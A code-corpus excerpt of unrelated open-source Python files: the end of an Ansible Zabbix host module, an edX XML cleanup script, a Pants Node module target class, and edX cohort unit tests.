                module.fail_json(msg="Specify at least one group for updating host '%s'." % host_name)
            if not force:
                module.fail_json(changed=False, result="Host present, Can't update configuration without force")
            # get exist host's interfaces
            exist_interfaces = host._zapi.hostinterface.get({'output': 'extend', 'hostids': host_id})
            exist_interfaces_copy = copy.deepcopy(exist_interfaces)
            # update host
            interfaces_len = len(interfaces) if interfaces else 0
            if len(exist_interfaces) > interfaces_len:
                # More existing interfaces than desired: update_host will mutate
                # exist_interfaces, so the comparison uses the live list here.
                if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
                                             exist_interfaces, zabbix_host_obj, proxy_id, visible_name):
                    host.link_or_clear_template(host_id, template_ids)
                    host.update_host(host_name, group_ids, status, host_id,
                                     interfaces, exist_interfaces, proxy_id, visible_name)
                    module.exit_json(changed=True,
                                     result="Successfully update host %s (%s) and linked with template '%s'"
                                            % (host_name, ip, link_templates))
                else:
                    module.exit_json(changed=False)
            else:
                # Otherwise compare against the deep copy so update_host's
                # in-place removals cannot skew the comparison.
                if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
                                             exist_interfaces_copy, zabbix_host_obj, proxy_id, visible_name):
                    host.update_host(host_name, group_ids, status, host_id, interfaces, exist_interfaces, proxy_id, visible_name)
                    host.link_or_clear_template(host_id, template_ids)
                    host.update_inventory_mode(host_id, inventory_mode)
                    module.exit_json(changed=True,
                                     result="Successfully update host %s (%s) and linked with template '%s'"
                                            % (host_name, ip, link_templates))
                else:
                    module.exit_json(changed=False)
    else:
        if state == "absent":
            # the host is already deleted.
            module.exit_json(changed=False)
        # Use proxy specified, or set to 0 when adding new host
        if proxy:
            proxy_id = host.get_proxyid_by_proxy_name(proxy)
        else:
            proxy_id = 0
        if not group_ids:
            module.fail_json(msg="Specify at least one group for creating host '%s'." % host_name)
        if not interfaces or (interfaces and len(interfaces) == 0):
            module.fail_json(msg="Specify at least one interface for creating host '%s'." % host_name)
        # create host
        host_id = host.add_host(host_name, group_ids, status, interfaces, proxy_id, visible_name)
        host.link_or_clear_template(host_id, template_ids)
        host.update_inventory_mode(host_id, inventory_mode)
        module.exit_json(changed=True, result="Successfully added host %s (%s) and linked with template '%s'" % (
            host_name, ip, link_templates))

if __name__ == '__main__':
    main()
| gpl-3.0 |
nanolearning/edx-platform | common/xml_cleanup.py | 67 | 3431 | #!/usr/bin/env python
"""
Victor's xml cleanup script. A big pile of useful hacks. Do not use
without carefully reading the code and deciding that this is what you want.
In particular, the remove-meta option is only intended to be used after pulling out a policy
using the metadata_to_json management command.
"""
import os
import fnmatch
import re
import sys
from lxml import etree
from collections import defaultdict
# Characters that are not legal in location url_names.
INVALID_CHARS = re.compile(r"[^\w.-]")

def clean(value):
    """Return value, made into a form legal for locations: every illegal
    character becomes '_' and runs of underscores are collapsed to one."""
    sanitized = INVALID_CHARS.sub('_', value)
    return re.sub('_+', '_', sanitized)
# category -> set of url_names for that category that we've already seen
used_names = defaultdict(set)

def clean_unique(category, name):
    """Return a cleaned form of name that is unique within category,
    appending the smallest positive integer suffix needed and recording
    the result in used_names."""
    candidate = clean(name)
    seen = used_names[category]
    if candidate in seen:
        # Already taken: probe candidate1, candidate2, ... for a free slot.
        suffix = 1
        while candidate + str(suffix) in seen:
            suffix += 1
        candidate = candidate + str(suffix)
    seen.add(candidate)
    return candidate
def cleanup(filepath, remove_meta):
    """Normalize one XML file in place: convert 'name' attributes to
    display_name + a unique url_name, collapse pointer tags, and (when
    remove_meta is set) strip attributes that now live in the policy file."""
    # Keys that are exported to the policy file, and so
    # can be removed from the xml afterward
    to_remove = ('format', 'display_name',
                 'graceperiod', 'showanswer', 'rerandomize',
                 'start', 'due', 'graded', 'hide_from_toc',
                 'ispublic', 'xqa_key')
    try:
        print "Cleaning {0}".format(filepath)
        with open(filepath) as f:
            parser = etree.XMLParser(remove_comments=False)
            xml = etree.parse(filepath, parser=parser)
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
        # narrowing to parse/IO errors would be safer.
        print "Error parsing file {0}".format(filepath)
        return
    for node in xml.iter(tag=etree.Element):
        attrs = node.attrib
        if 'url_name' in attrs:
            used_names[node.tag].add(attrs['url_name'])
        if 'name' in attrs:
            # Replace name with an identical display_name, and a unique url_name
            name = attrs['name']
            attrs['display_name'] = name
            attrs['url_name'] = clean_unique(node.tag, name)
            del attrs['name']
        if 'url_name' in attrs and 'slug' in attrs:
            print "WARNING: {0} has both slug and url_name".format(node)
        if ('url_name' in attrs and 'filename' in attrs and
                len(attrs) == 2 and attrs['url_name'] == attrs['filename']):
            # This is a pointer tag in disguise. Get rid of the filename.
            print 'turning {0}.{1} into a pointer tag'.format(node.tag, attrs['url_name'])
            del attrs['filename']
        if remove_meta:
            # Strip metadata that was exported to the policy file.
            for attr in to_remove:
                if attr in attrs:
                    del attrs[attr]
    with open(filepath, "w") as f:
        f.write(etree.tostring(xml))
def find_replace(directory, filePattern, remove_meta):
    """Walk directory recursively and run cleanup() on every file whose
    name matches filePattern."""
    for root, _dirs, filenames in os.walk(os.path.abspath(directory)):
        for name in fnmatch.filter(filenames, filePattern):
            cleanup(os.path.join(root, name), remove_meta)
def main(args):
    """CLI entry point; args is sys.argv[1:]: a directory followed by an
    optional literal 'remove-meta' flag."""
    usage = "xml_cleanup [dir] [remove-meta]"
    n = len(args)
    if n < 1 or n > 2 or (n == 2 and args[1] != 'remove-meta'):
        print usage
        return
    remove_meta = False
    if n == 2:
        remove_meta = True
    find_replace(args[0], '*.xml', remove_meta)

if __name__ == '__main__':
    main(sys.argv[1:])
| agpl-3.0 |
kwlzn/pants | contrib/node/src/python/pants/contrib/node/targets/node_preinstalled_module.py | 18 | 1883 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.base.payload import Payload
from pants.base.payload_field import PrimitiveField
from pants.contrib.node.targets.node_module import NodeModule
class NodePreinstalledModule(NodeModule):
    """A NodeModule which resolves deps by downloading an archived node_modules directory.

    This is basically an example, to demonstrate how additional types of NodeModule targets with
    their own resolvers (in this case NodePreinstalledModuleResolver), which still work with
    NodeTest, can be registered. To be generally correct, this target type and associated resolver
    would have to use platform- and Node-version-specific node_modules archives, rather than just
    a single dependencies_archive_url used verbatim. Consider NodePreinstalledModule and
    NodePreinstalledModuleResolver subject to future change or removal for now.
    """

    def __init__(self, dependencies_archive_url=None, sources=None,
                 address=None, payload=None, **kwargs):
        """
        :param string dependencies_archive_url: The location of a tar.gz file containing a
            node_modules directory.
        """
        payload = payload or Payload()
        payload.add_fields({
            'dependencies_archive_url': PrimitiveField(dependencies_archive_url),
        })
        super(NodePreinstalledModule, self).__init__(sources=sources, address=address,
                                                     payload=payload, **kwargs)

    @property
    def dependencies_archive_url(self):
        """Where to download the archive containing the node_modules directory.

        :rtype: string
        """
        return self.payload.dependencies_archive_url
| apache-2.0 |
mbareta/edx-platform-ft | openedx/core/djangoapps/course_groups/tests/test_cohorts.py | 11 | 33670 | """
Tests for cohorts
"""
# pylint: disable=no-member
import ddt
from mock import call, patch
from nose.plugins.attrib import attr
import before_after
from django.contrib.auth.models import User
from django.db import IntegrityError
from django.http import Http404
from django.test import TestCase
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import ToyCourseFactory
from ..models import CourseUserGroup, CourseCohort, CourseUserGroupPartitionGroup
from .. import cohorts
from ..tests.helpers import (
topic_name_to_id, config_course_cohorts, config_course_cohorts_legacy,
CohortFactory, CourseCohortFactory, CourseCohortSettingsFactory
)
@attr('shard_2')
@patch("openedx.core.djangoapps.course_groups.cohorts.tracker", autospec=True)
class TestCohortSignals(TestCase):
"""
Test cases to validate event emissions for various cohort-related workflows
"""
def setUp(self):
    # Shared dummy course key; no real course content is needed because
    # these tests only exercise CourseUserGroup signal handlers.
    super(TestCohortSignals, self).setUp()
    self.course_key = SlashSeparatedCourseKey("dummy", "dummy", "dummy")
def test_cohort_added(self, mock_tracker):
# Add cohort
cohort = CourseUserGroup.objects.create(
name="TestCohort",
course_id=self.course_key,
group_type=CourseUserGroup.COHORT
)
mock_tracker.emit.assert_called_with(
"edx.cohort.created",
{"cohort_id": cohort.id, "cohort_name": cohort.name}
)
mock_tracker.reset_mock()
# Modify existing cohort
cohort.name = "NewName"
cohort.save()
self.assertFalse(mock_tracker.called)
# Add non-cohort group
CourseUserGroup.objects.create(
name="TestOtherGroupType",
course_id=self.course_key,
group_type="dummy"
)
self.assertFalse(mock_tracker.called)
def test_cohort_membership_changed(self, mock_tracker):
cohort_list = [CohortFactory() for _ in range(2)]
non_cohort = CourseUserGroup.objects.create(
name="dummy",
course_id=self.course_key,
group_type="dummy"
)
user_list = [UserFactory() for _ in range(2)]
mock_tracker.reset_mock()
def assert_events(event_name_suffix, user_list, cohort_list):
"""
Confirms the presence of the specifed event for each user in the specified list of cohorts
"""
mock_tracker.emit.assert_has_calls([
call(
"edx.cohort.user_" + event_name_suffix,
{
"user_id": user.id,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
}
)
for user in user_list for cohort in cohort_list
])
# Add users to cohort
cohort_list[0].users.add(*user_list)
assert_events("added", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Remove users from cohort
cohort_list[0].users.remove(*user_list)
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from cohort
cohort_list[0].users.add(*user_list)
cohort_list[0].users.clear()
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from non-cohort group
non_cohort.users.add(*user_list)
non_cohort.users.clear()
self.assertFalse(mock_tracker.emit.called)
# Add cohorts to user
user_list[0].course_groups.add(*cohort_list)
assert_events("added", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Remove cohorts from user
user_list[0].course_groups.remove(*cohort_list)
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear cohorts from user
user_list[0].course_groups.add(*cohort_list)
user_list[0].course_groups.clear()
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear non-cohort groups from user
user_list[0].course_groups.add(non_cohort)
user_list[0].course_groups.clear()
self.assertFalse(mock_tracker.emit.called)
@attr('shard_2')
@ddt.ddt
class TestCohorts(ModuleStoreTestCase):
    """
    Test the cohorts feature
    """
    MODULESTORE = TEST_DATA_MIXED_MODULESTORE

    def setUp(self):
        """
        Make sure that course is reloaded every time--clear out the modulestore.
        """
        super(TestCohorts, self).setUp()
        self.toy_course_key = ToyCourseFactory.create().id

    def _create_cohort(self, course_id, cohort_name, assignment_type):
        """
        Create a cohort for testing.
        """
        cohort = CohortFactory(course_id=course_id, name=cohort_name)
        CourseCohortFactory(course_user_group=cohort, assignment_type=assignment_type)
        return cohort

    def test_is_course_cohorted(self):
        """
        Make sure cohorts.is_course_cohorted() correctly reports if a course is cohorted or not.
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertFalse(cohorts.is_course_cohorted(course.id))
        config_course_cohorts(course, is_cohorted=True)
        self.assertTrue(cohorts.is_course_cohorted(course.id))
        # Make sure we get a Http404 if there's no course
        fake_key = SlashSeparatedCourseKey('a', 'b', 'c')
        self.assertRaises(Http404, lambda: cohorts.is_course_cohorted(fake_key))

    def test_get_cohort_id(self):
        """
        Make sure that cohorts.get_cohort_id() correctly returns the cohort id, or raises Http404 when given an
        invalid course key.
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertFalse(cohorts.is_course_cohorted(course.id))
        user = UserFactory(username="test", email="a@b.com")
        # No cohort assigned yet -> None
        self.assertIsNone(cohorts.get_cohort_id(user, course.id))
        config_course_cohorts(course, is_cohorted=True)
        cohort = CohortFactory(course_id=course.id, name="TestCohort", users=[user])
        self.assertEqual(cohorts.get_cohort_id(user, course.id), cohort.id)
        self.assertRaises(
            Http404,
            lambda: cohorts.get_cohort_id(user, SlashSeparatedCourseKey("course", "does_not", "exist"))
        )

    def test_assignment_type(self):
        """
        Make sure that cohorts.set_assignment_type() and cohorts.get_assignment_type() works correctly.
        """
        course = modulestore().get_course(self.toy_course_key)
        # We are creating two random cohorts because we can't change assignment type of
        # random cohort if it is the only random cohort present.
        cohort1 = self._create_cohort(course.id, "TestCohort1", CourseCohort.RANDOM)
        self._create_cohort(course.id, "TestCohort2", CourseCohort.RANDOM)
        cohort3 = self._create_cohort(course.id, "TestCohort3", CourseCohort.MANUAL)
        self.assertEqual(cohorts.get_assignment_type(cohort1), CourseCohort.RANDOM)
        cohorts.set_assignment_type(cohort1, CourseCohort.MANUAL)
        self.assertEqual(cohorts.get_assignment_type(cohort1), CourseCohort.MANUAL)
        cohorts.set_assignment_type(cohort3, CourseCohort.RANDOM)
        self.assertEqual(cohorts.get_assignment_type(cohort3), CourseCohort.RANDOM)

    def test_cannot_set_assignment_type(self):
        """
        Make sure that we can't change the assignment type of a random cohort if it is the only random cohort present.
        """
        course = modulestore().get_course(self.toy_course_key)
        cohort = self._create_cohort(course.id, "TestCohort", CourseCohort.RANDOM)
        self.assertEqual(cohorts.get_assignment_type(cohort), CourseCohort.RANDOM)
        exception_msg = "There must be one cohort to which students can automatically be assigned."
        with self.assertRaises(ValueError) as context_manager:
            cohorts.set_assignment_type(cohort, CourseCohort.MANUAL)
        self.assertEqual(exception_msg, str(context_manager.exception))

    def test_get_cohort(self):
        """
        Make sure cohorts.get_cohort() does the right thing when the course is cohorted
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertEqual(course.id, self.toy_course_key)
        self.assertFalse(cohorts.is_course_cohorted(course.id))
        user = UserFactory(username="test", email="a@b.com")
        other_user = UserFactory(username="test2", email="a2@b.com")
        self.assertIsNone(cohorts.get_cohort(user, course.id), "No cohort created yet")
        cohort = CohortFactory(course_id=course.id, name="TestCohort", users=[user])
        # Cohort membership exists, but the course is not cohorted yet.
        self.assertIsNone(
            cohorts.get_cohort(user, course.id),
            "Course isn't cohorted, so shouldn't have a cohort"
        )
        # Make the course cohorted...
        config_course_cohorts(course, is_cohorted=True)
        self.assertEquals(
            cohorts.get_cohort(user, course.id).id,
            cohort.id,
            "user should be assigned to the correct cohort"
        )
        self.assertEquals(
            cohorts.get_cohort(other_user, course.id).id,
            cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
            "other_user should be assigned to the default cohort"
        )

    @ddt.data(
        (True, 3),
        (False, 9),
    )
    @ddt.unpack
    def test_get_cohort_sql_queries(self, use_cached, num_sql_queries):
        """
        Test number of queries by cohorts.get_cohort() with and without caching.
        """
        course = modulestore().get_course(self.toy_course_key)
        config_course_cohorts(course, is_cohorted=True)
        user = UserFactory(username="test", email="a@b.com")
        CohortFactory.create(course_id=course.id, name="TestCohort", users=[user])
        # Three identical lookups: the cached path should only pay for the first.
        with self.assertNumQueries(num_sql_queries):
            for __ in range(3):
                cohorts.get_cohort(user, course.id, use_cached=use_cached)

    def test_get_cohort_with_assign(self):
        """
        Make sure cohorts.get_cohort() returns None if no group is already
        assigned to a user instead of assigning/creating a group automatically
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertFalse(cohorts.is_course_cohorted(course.id))
        user = UserFactory(username="test", email="a@b.com")
        # Add an auto_cohort_group to the course...
        config_course_cohorts(
            course,
            is_cohorted=True,
            auto_cohorts=["AutoGroup"]
        )
        # get_cohort should return None as no group is assigned to user
        self.assertIsNone(cohorts.get_cohort(user, course.id, assign=False))
        # get_cohort should return a group for user
        self.assertEquals(cohorts.get_cohort(user, course.id).name, "AutoGroup")

    def test_cohorting_with_auto_cohorts(self):
        """
        Make sure cohorts.get_cohort() does the right thing.
        If there are auto cohort groups then a user should be assigned one.
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertFalse(cohorts.is_course_cohorted(course.id))
        user1 = UserFactory(username="test", email="a@b.com")
        user2 = UserFactory(username="test2", email="a2@b.com")
        cohort = CohortFactory(course_id=course.id, name="TestCohort", users=[user1])
        # Add an auto_cohort_group to the course...
        config_course_cohorts(
            course,
            is_cohorted=True,
            auto_cohorts=["AutoGroup"]
        )
        self.assertEquals(cohorts.get_cohort(user1, course.id).id, cohort.id, "user1 should stay put")
        self.assertEquals(cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should be auto-cohorted")

    def test_cohorting_with_migrations_done(self):
        """
        Verifies that cohort config changes on studio/modulestore side will
        not be reflected on lms after the migrations are done.
        """
        course = modulestore().get_course(self.toy_course_key)
        user1 = UserFactory(username="test", email="a@b.com")
        user2 = UserFactory(username="test2", email="a2@b.com")
        # Add an auto_cohort_group to the course...
        config_course_cohorts(
            course,
            is_cohorted=True,
            auto_cohorts=["AutoGroup"]
        )
        self.assertEquals(cohorts.get_cohort(user1, course.id).name, "AutoGroup", "user1 should be auto-cohorted")
        # Now set the auto_cohort_group to something different
        # This will have no effect on lms side as we are already done with migrations
        config_course_cohorts_legacy(
            course,
            discussions=[],
            cohorted=True,
            auto_cohort_groups=["OtherGroup"]
        )
        self.assertEquals(
            cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should be assigned to AutoGroups"
        )
        self.assertEquals(
            cohorts.get_cohort(user1, course.id).name, "AutoGroup", "user1 should still be in originally placed cohort"
        )

    def test_cohorting_with_no_auto_cohorts(self):
        """
        Make sure cohorts.get_cohort() does the right thing.
        If there are not auto cohorts then a user should be assigned to Default Cohort Group.
        Also verifies that cohort config changes on studio/modulestore side will
        not be reflected on lms after the migrations are done.
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertFalse(cohorts.is_course_cohorted(course.id))
        user1 = UserFactory(username="test", email="a@b.com")
        user2 = UserFactory(username="test2", email="a2@b.com")
        # Make the auto_cohort_group list empty
        config_course_cohorts(
            course,
            is_cohorted=True,
            auto_cohorts=[]
        )
        self.assertEquals(
            cohorts.get_cohort(user1, course.id).id,
            cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
            "No groups->default cohort for user1"
        )
        # Add an auto_cohort_group to the course
        # This will have no effect on lms side as we are already done with migrations
        config_course_cohorts_legacy(
            course,
            discussions=[],
            cohorted=True,
            auto_cohort_groups=["AutoGroup"]
        )
        self.assertEquals(
            cohorts.get_cohort(user1, course.id).name,
            cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).name,
            "user1 should still be in the default cohort"
        )
        self.assertEquals(
            cohorts.get_cohort(user2, course.id).id,
            cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
            "No groups->default cohort for user2"
        )

    def test_auto_cohorting_randomization(self):
        """
        Make sure cohorts.get_cohort() randomizes properly.
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertFalse(cohorts.is_course_cohorted(course.id))
        groups = ["group_{0}".format(n) for n in range(5)]
        config_course_cohorts(
            course, is_cohorted=True, auto_cohorts=groups
        )
        # Assign 100 users to cohorts
        for i in range(100):
            user = UserFactory(
                username="test_{0}".format(i),
                email="a@b{0}.com".format(i)
            )
            cohorts.get_cohort(user, course.id)
        # Now make sure that the assignment was at least vaguely random:
        # each cohort should have more than 1, and fewer than 50 students.
        # (with 5 groups, probability of 0 users in any group is about
        # .8**100= 2.0e-10)
        for cohort_name in groups:
            cohort = cohorts.get_cohort_by_name(course.id, cohort_name)
            num_users = cohort.users.count()
            # NOTE(review): assertGreater(num_users, 1) requires at least 2 users
            # per cohort, slightly stronger than "at least 1" -- presumably fine
            # with 100 users over 5 groups, but confirm the intent.
            self.assertGreater(num_users, 1)
            self.assertLess(num_users, 50)

    def test_get_course_cohorts_noop(self):
        """
        Tests get_course_cohorts returns an empty list when no cohorts exist.
        """
        course = modulestore().get_course(self.toy_course_key)
        config_course_cohorts(course, is_cohorted=True)
        self.assertEqual([], cohorts.get_course_cohorts(course))

    def test_get_course_cohorts(self):
        """
        Tests that get_course_cohorts returns all cohorts, including auto cohorts.
        """
        course = modulestore().get_course(self.toy_course_key)
        config_course_cohorts(
            course,
            is_cohorted=True,
            auto_cohorts=["AutoGroup1", "AutoGroup2"]
        )
        # add manual cohorts to course 1
        CohortFactory(course_id=course.id, name="ManualCohort")
        CohortFactory(course_id=course.id, name="ManualCohort2")
        cohort_set = {c.name for c in cohorts.get_course_cohorts(course)}
        self.assertEqual(cohort_set, {"AutoGroup1", "AutoGroup2", "ManualCohort", "ManualCohort2"})

    def test_get_cohort_names(self):
        """get_cohort_names maps cohort ids to cohort names for a course."""
        course = modulestore().get_course(self.toy_course_key)
        cohort1 = CohortFactory(course_id=course.id, name="Cohort1")
        cohort2 = CohortFactory(course_id=course.id, name="Cohort2")
        self.assertEqual(
            cohorts.get_cohort_names(course),
            {cohort1.id: cohort1.name, cohort2.id: cohort2.name}
        )

    def test_get_cohorted_commentables(self):
        """
        Make sure cohorts.get_cohorted_commentables() correctly returns a list of strings representing cohorted
        commentables. Also verify that we can't get the cohorted commentables from a course which does not exist.
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
        config_course_cohorts(course, is_cohorted=True)
        self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
        config_course_cohorts(
            course,
            is_cohorted=True,
            discussion_topics=["General", "Feedback"],
            cohorted_discussions=["Feedback"]
        )
        self.assertItemsEqual(
            cohorts.get_cohorted_commentables(course.id),
            set([topic_name_to_id(course, "Feedback")])
        )
        config_course_cohorts(
            course,
            is_cohorted=True,
            discussion_topics=["General", "Feedback"],
            cohorted_discussions=["General", "Feedback"]
        )
        self.assertItemsEqual(
            cohorts.get_cohorted_commentables(course.id),
            set([topic_name_to_id(course, "General"), topic_name_to_id(course, "Feedback")])
        )
        self.assertRaises(
            Http404,
            lambda: cohorts.get_cohorted_commentables(SlashSeparatedCourseKey("course", "does_not", "exist"))
        )

    def test_get_cohort_by_name(self):
        """
        Make sure cohorts.get_cohort_by_name() properly finds a cohort by name for a given course. Also verify that it
        raises an error when the cohort is not found.
        """
        course = modulestore().get_course(self.toy_course_key)
        self.assertRaises(
            CourseUserGroup.DoesNotExist,
            lambda: cohorts.get_cohort_by_name(course.id, "CohortDoesNotExist")
        )
        cohort = CohortFactory(course_id=course.id, name="MyCohort")
        self.assertEqual(cohorts.get_cohort_by_name(course.id, "MyCohort"), cohort)
        # NOTE(review): the cohort *object* is passed here where a name string is
        # expected; the lookup still misses because the course key doesn't exist,
        # but confirm whether `cohort.name` was intended.
        self.assertRaises(
            CourseUserGroup.DoesNotExist,
            lambda: cohorts.get_cohort_by_name(SlashSeparatedCourseKey("course", "does_not", "exist"), cohort)
        )

    def test_get_cohort_by_id(self):
        """
        Make sure cohorts.get_cohort_by_id() properly finds a cohort by id for a given
        course.
        """
        course = modulestore().get_course(self.toy_course_key)
        cohort = CohortFactory(course_id=course.id, name="MyCohort")
        self.assertEqual(cohorts.get_cohort_by_id(course.id, cohort.id), cohort)
        cohort.delete()
        self.assertRaises(
            CourseUserGroup.DoesNotExist,
            lambda: cohorts.get_cohort_by_id(course.id, cohort.id)
        )

    @patch("openedx.core.djangoapps.course_groups.cohorts.tracker")
    def test_add_cohort(self, mock_tracker):
        """
        Make sure cohorts.add_cohort() properly adds a cohort to a course and handles
        errors.
        """
        assignment_type = CourseCohort.RANDOM
        course = modulestore().get_course(self.toy_course_key)
        added_cohort = cohorts.add_cohort(course.id, "My Cohort", assignment_type)
        mock_tracker.emit.assert_any_call(
            "edx.cohort.creation_requested",
            {"cohort_name": added_cohort.name, "cohort_id": added_cohort.id}
        )
        self.assertEqual(added_cohort.name, "My Cohort")
        # Duplicate name within the same course is rejected.
        self.assertRaises(
            ValueError,
            lambda: cohorts.add_cohort(course.id, "My Cohort", assignment_type)
        )
        # Nonexistent course is rejected.
        does_not_exist_course_key = SlashSeparatedCourseKey("course", "does_not", "exist")
        self.assertRaises(
            ValueError,
            lambda: cohorts.add_cohort(does_not_exist_course_key, "My Cohort", assignment_type)
        )

    @patch("openedx.core.djangoapps.course_groups.cohorts.tracker")
    def test_add_user_to_cohort(self, mock_tracker):
        """
        Make sure cohorts.add_user_to_cohort() properly adds a user to a cohort and
        handles errors.
        """
        course_user = UserFactory(username="Username", email="a@b.com")
        UserFactory(username="RandomUsername", email="b@b.com")
        course = modulestore().get_course(self.toy_course_key)
        CourseEnrollment.enroll(course_user, self.toy_course_key)
        first_cohort = CohortFactory(course_id=course.id, name="FirstCohort")
        second_cohort = CohortFactory(course_id=course.id, name="SecondCohort")
        # Success cases
        # We shouldn't get back a previous cohort, since the user wasn't in one
        self.assertEqual(
            cohorts.add_user_to_cohort(first_cohort, "Username"),
            (course_user, None)
        )
        mock_tracker.emit.assert_any_call(
            "edx.cohort.user_add_requested",
            {
                "user_id": course_user.id,
                "cohort_id": first_cohort.id,
                "cohort_name": first_cohort.name,
                "previous_cohort_id": None,
                "previous_cohort_name": None,
            }
        )
        # Should get (user, previous_cohort_name) when moved from one cohort to
        # another
        self.assertEqual(
            cohorts.add_user_to_cohort(second_cohort, "Username"),
            (course_user, "FirstCohort")
        )
        mock_tracker.emit.assert_any_call(
            "edx.cohort.user_add_requested",
            {
                "user_id": course_user.id,
                "cohort_id": second_cohort.id,
                "cohort_name": second_cohort.name,
                "previous_cohort_id": first_cohort.id,
                "previous_cohort_name": first_cohort.name,
            }
        )
        # Error cases
        # Should get ValueError if user already in cohort
        self.assertRaises(
            ValueError,
            lambda: cohorts.add_user_to_cohort(second_cohort, "Username")
        )
        # UserDoesNotExist if user truly does not exist
        self.assertRaises(
            User.DoesNotExist,
            lambda: cohorts.add_user_to_cohort(first_cohort, "non_existent_username")
        )

    # NOTE(review): this method name lacks the "test_" prefix, so standard test
    # runners never collect it -- confirm whether the test was deliberately
    # disabled or the prefix was dropped by accident.
    @patch("openedx.core.djangoapps.course_groups.cohorts.tracker")
    def add_user_to_cohorts_race_condition(self, mock_tracker):
        """
        Makes use of before_after to force a race condition, in order to
        confirm handling of such conditions is done correctly.
        """
        course_user = UserFactory(username="Username", email="a@b.com")
        course = modulestore().get_course(self.toy_course_key)
        CourseEnrollment.enroll(course_user, self.toy_course_key)
        first_cohort = CohortFactory(course_id=course.id, name="FirstCohort")
        second_cohort = CohortFactory(course_id=course.id, name="SecondCohort")
        # This before_after contextmanager allows for reliable reproduction of a race condition.
        # It will break before the first save() call creates an entry, and then run add_user_to_cohort again.
        # Because this second call will write before control is returned, the first call will be writing stale data.
        # This test confirms that the first add_user_to_cohort call can handle this stale read condition properly.
        # Proper handling is defined as treating calls as sequential, with write time deciding the order.
        # NOTE(review): after_ftn is given the *result* of calling
        # add_user_to_cohort immediately (it runs here, before the context is
        # entered), not a callable; before_after presumably expects a function,
        # e.g. a lambda -- verify against the before_after API.
        with before_after.before_after(
            'django.db.models.Model.save',
            after_ftn=cohorts.add_user_to_cohort(second_cohort, course_user.username),
            autospec=True
        ):
            # This method will read, then break, then try to write stale data.
            # It should fail at that, then retry with refreshed data
            cohorts.add_user_to_cohort(first_cohort, course_user.username)
        mock_tracker.emit.assert_any_call(
            "edx.cohort.user_add_requested",
            {
                "user_id": course_user.id,
                "cohort_id": first_cohort.id,
                "cohort_name": first_cohort.name,
                "previous_cohort_id": second_cohort.id,
                "previous_cohort_name": second_cohort.name,
            }
        )
        # Note that the following get() will fail with MultipleObjectsReturned if race condition is not handled.
        self.assertEqual(first_cohort.users.get(), course_user)

    def test_get_course_cohort_settings(self):
        """
        Test that cohorts.get_course_cohort_settings is working as expected.
        """
        course = modulestore().get_course(self.toy_course_key)
        course_cohort_settings = cohorts.get_course_cohort_settings(course.id)
        self.assertFalse(course_cohort_settings.is_cohorted)
        self.assertEqual(course_cohort_settings.cohorted_discussions, [])
        self.assertTrue(course_cohort_settings.always_cohort_inline_discussions)

    def test_update_course_cohort_settings(self):
        """
        Test that cohorts.set_course_cohort_settings is working as expected.
        """
        course = modulestore().get_course(self.toy_course_key)
        CourseCohortSettingsFactory(course_id=course.id)
        cohorts.set_course_cohort_settings(
            course.id,
            is_cohorted=False,
            cohorted_discussions=['topic a id', 'topic b id'],
            always_cohort_inline_discussions=False
        )
        course_cohort_settings = cohorts.get_course_cohort_settings(course.id)
        self.assertFalse(course_cohort_settings.is_cohorted)
        self.assertEqual(course_cohort_settings.cohorted_discussions, ['topic a id', 'topic b id'])
        self.assertFalse(course_cohort_settings.always_cohort_inline_discussions)

    def test_update_course_cohort_settings_with_invalid_data_type(self):
        """
        Test that cohorts.set_course_cohort_settings raises exception if fields have incorrect data type.
        """
        course = modulestore().get_course(self.toy_course_key)
        CourseCohortSettingsFactory(course_id=course.id)
        exception_msg_tpl = "Incorrect field type for `{}`. Type must be `{}`"
        fields = [
            {'name': 'is_cohorted', 'type': bool},
            {'name': 'always_cohort_inline_discussions', 'type': bool},
            {'name': 'cohorted_discussions', 'type': list}
        ]
        # Each field is passed an empty string, which is the wrong type for all of them.
        for field in fields:
            with self.assertRaises(ValueError) as value_error:
                cohorts.set_course_cohort_settings(course.id, **{field['name']: ''})
            self.assertEqual(
                value_error.exception.message,
                exception_msg_tpl.format(field['name'], field['type'].__name__)
            )
@attr('shard_2')
@ddt.ddt
class TestCohortsAndPartitionGroups(ModuleStoreTestCase):
    """
    Test Cohorts and Partitions Groups.
    """
    MODULESTORE = TEST_DATA_MIXED_MODULESTORE

    def setUp(self):
        """
        Regenerate a test course and cohorts for each test
        """
        super(TestCohortsAndPartitionGroups, self).setUp()
        self.test_course_key = ToyCourseFactory.create().id
        self.course = modulestore().get_course(self.test_course_key)
